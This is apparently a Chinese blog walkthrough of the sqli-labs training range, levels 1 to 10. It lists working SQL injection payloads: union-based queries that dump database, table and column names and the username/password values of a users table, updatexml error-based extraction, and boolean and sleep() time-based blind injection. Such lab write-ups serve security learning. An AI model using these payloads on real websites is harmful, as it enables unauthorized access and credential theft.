sqli-lab靶场通关

文章目录

less-1

1、提示输入参数id,且值为数字;

2、判断是否存在注入点

php 复制代码
	id=1'

报错,说明存在 SQL注入漏洞。

3、判断字符型还是数字型

php 复制代码
	id=1 and 1=1 --+
	id=1 and 1=2 --+
	id=1" --+

注意,注释#可能没有--+好使

两次页面返回均正常,说明为字符型注入。

下面判断闭合类型:

也可以从报错的地方看出是单引号闭合。

可以看出是单引号闭合。

综上,该关卡属于字符型注入,且闭合符号为单引号。

4、判断字段数

php 复制代码
	id=1' order by 3 --+

字段数为三,也就是说sql查询的结果中,有三列数据。

5、查看回显点

php 复制代码
	id=-1' union select 1,2,3 --+

注意:要确保union select前面的语句,也就是id在数据库中是不存在的,才会看到回显点。

6、查看数据库名

php 复制代码
	id=-1' union select 1,(select database()),3 --+

可以得到数据库名为security.

7、查看表名

php 复制代码
	id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

可以看出security表中,有四张表。

8、查看字段名

php 复制代码
	id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

9、查看字段值

php 复制代码
	id=-1' union select 1,(select group_concat(concat(username,'%23',password)) from security.users),3 --+
复制代码
下面主要介绍思路,就不全流程走完了。

less-2

1、判断是否存在注入漏洞

php 复制代码
	id=1' 

说明存在SQL注入漏洞。

2、判断字符型还是数字型

php 复制代码
	id=1 and 1=1 --+
	id=1 and 1=2 --+


说明属于数字型注入。

3、判断字段数

php 复制代码
	id=1 order by 3 --+

>后面的步骤和前一关一样,在这里不在赘述。

less-3

1、用单引号判断是否存在sql注入。

说明存在sql注入漏洞。

2、判断字符型还是数字型

返回正常,说明属于字符型注入。

下面确定闭合符号:

从这里看出,后端代码是在id值后面加了'),再进行查询的。

所以,闭合符号为')


less-4

用单引号判断是否存在sql注入。

单引号不行,试试双引号,

说明存在SQL注入漏洞。单引号没反应,只能说明此处的闭合方式没用到单引号,试试其他符号。

从这里可以看出,闭合方式是双引号+单括号。最外面的那个单引号是为了区分其他无关报错信息。

less-5

用单引号判断是否存在SQL注入漏洞

可以看到,存在SQL注入漏洞,且闭合符号为单引号。

因为页面没有回显,所以,这里,我们不能用联合查询,需要用盲注。

可以看到,此处只有两种页面显示,可以使用布尔盲注;

因为有报错,所以也可以使用报错注入。

使用盲注,直接判断数据库长度

php 复制代码
	id=1' and length(database())=8 --+ //判断数据库名长度

说明当前数据库名的长度为8,这里就不演示布尔盲注,太麻烦了~盲注。

这里使用报错注入进行演示:

(1)查数据库名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

(2)查表名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+ 

(3)查字段名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 

(4)查字段值

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(concat(username,'%23',password)) from security.users),0x7e),1) --+ 

注意:该语句对输出的字符长度也做了限制,其最长输出32位。

less-6

单引号判断是否存在sql注入漏洞;

单引号不行,双引号上,成了~

可以看出,只有双引号闭合,故试试:

既然有报错,那就用报错注入吧~

查数据库名

php 复制代码
	id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

后面就不多赘述了~

less-7

用单引号判断是否存在sql注入

页面返回不一样,所以存在SQL注入漏洞,但是没有报错也没有回显,只能使用盲注。

需要试试,出来闭合符号为'))

使用布尔盲注,直接判断数据库长度

php 复制代码
	id=1')) and length(database())=8 --+ //判断数据库名长度

less-8



通过单引号判断存在 sql注入漏洞;同时,发现闭合引号就是单引号。因为此处没有报错,也没有回显,只能用布尔盲注。

使用布尔盲注,直接判断数据库长度

php 复制代码
	id=1')) and length(database())=8 --+ //判断数据库名长度

less-9

这一关需要用时间盲注,payload:

php 复制代码
	id=1 and sleep(5) --+ //数字型则等待5秒
	id=1' and sleep(5) --+ //字符型则等待5秒

可知存在SQL注入漏洞,闭合符号为单引号,且类型属于时间盲注。

使用时间盲注,直接判断数据库长度

php 复制代码
	id=1' and if(length(database())=8,sleep(5),1) --+ //猜数据库名长度

数据库长度为8,后续就是一个一个字母猜数据库名,然后表名、字段名、字段内容,在这里不在赘述。

less-10

这一关与前一关得区别主要是,闭合符号换成了双引号,其余都一样。

相关推荐
zskj_zhyl6 小时前
毫米波雷达守护银发安全:七彩喜跌倒检测仪重构居家养老防线
人工智能·安全·重构
qq_3129201111 小时前
开源入侵防御系统——CrowdSec
安全·开源
饶了我吧,放了我吧13 小时前
计算机网络实验——无线局域网安全实验
计算机网络·安全·web安全
TracyCoder12313 小时前
Apache Shiro 框架详解
安全·apache·shiro·认证·登录
字节跳动安全中心15 小时前
当AI智能体学会“欺骗”,我们如何自保?来自火山的MCP安全答卷
安全·llm·mcp
muyun280015 小时前
安全访问云端内部应用:用frp的stcp功能解决SSH转发的痛点
运维·安全·ssh·frp
橘子洲头17 小时前
Sigma-Aldrich细胞培养基础知识:细胞培养的安全注意事项
其他·安全
自由鬼20 小时前
正向代理服务器Squid:功能、架构、部署与应用深度解析
java·运维·服务器·程序人生·安全·架构·代理
dingzd951 天前
了解去中心化金融在现代经济中的作用——安全交易新时代
安全·金融·web3·去中心化·facebook·tiktok·instagram
weixin_472339461 天前
网络安全基石:从弱口令治理到动态防御体系的构建
安全·web安全